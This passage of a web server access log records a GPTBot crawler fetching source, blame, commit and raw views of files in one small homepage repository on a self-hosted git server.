3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" [Client 74.7.227.38] [Length 11263] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" [Client 74.7.227.38] [Length 11851] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" [Client 74.7.227.38] [Length 11850] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" [Client 74.7.227.38] [Length 10327] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" -[17/Feb/2026:13:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" [Client 74.7.227.38] [Length 12746] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" [Client 74.7.227.38] [Length 11438] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services" [Client 74.7.227.38] [Length 9925] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" [Client 74.7.227.38] [Length 10568] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" [Client 74.7.227.38] [Length 11458] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" [Client 74.7.227.38] [Length 11485] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" -[17/Feb/2026:13:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" [Client 74.7.227.38] [Length 10352] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" -[17/Feb/2026:13:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" -[17/Feb/2026:13:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" -[17/Feb/2026:13:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" -[17/Feb/2026:13:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" [Client 74.7.227.38] [Length 11185] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" -[17/Feb/2026:13:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" [Client 74.7.227.38] [Length 11186] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" -[17/Feb/2026:13:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services" -[17/Feb/2026:13:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" -[17/Feb/2026:13:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" -[17/Feb/2026:13:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" [Client 74.7.227.38] [Length 10732] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" -[17/Feb/2026:13:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" [Client 74.7.227.38] [Length 10781] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" -[17/Feb/2026:13:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" -[17/Feb/2026:13:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" [Client 74.7.227.38] [Length 10353] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" -[17/Feb/2026:13:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" -[17/Feb/2026:13:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" [Client 74.7.227.38] [Length 11890] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" [Client 74.7.227.38] [Length 11610] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" -[17/Feb/2026:13:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" [Client 74.7.227.38] [Length 10086] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" -[17/Feb/2026:13:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" [Client 74.7.227.38] [Length 11852] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" [Client 74.7.227.38] [Length 11013] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" [Client 74.7.227.38] [Length 11267] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9875] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" -[17/Feb/2026:13:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" [Client 74.7.227.38] [Length 11671] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 29791] [Gzip 10.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" -[17/Feb/2026:13:05:36 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" -[17/Feb/2026:13:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" -[17/Feb/2026:13:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" [Client 74.7.227.38] [Length 10829] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" -[17/Feb/2026:13:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" -[17/Feb/2026:13:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" [Client 74.7.227.38] [Length 11188] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" -[17/Feb/2026:13:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" [Client 74.7.227.38] [Length 11211] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" -[17/Feb/2026:13:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" [Client 74.7.227.38] [Length 10354] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" -[17/Feb/2026:13:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" [Client 74.7.227.38] [Length 11484] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:13:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" -[17/Feb/2026:13:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" -[17/Feb/2026:13:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" -[17/Feb/2026:13:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" [Client 74.7.227.38] [Length 10955] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" -[17/Feb/2026:13:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:13:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" -[17/Feb/2026:13:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" -[17/Feb/2026:13:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" [Client 74.7.227.38] [Length 10312] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:13:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" -[17/Feb/2026:13:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" -[17/Feb/2026:13:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" [Client 74.7.227.38] [Length 11046] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:13:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 26317] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" -[17/Feb/2026:13:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 10312] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 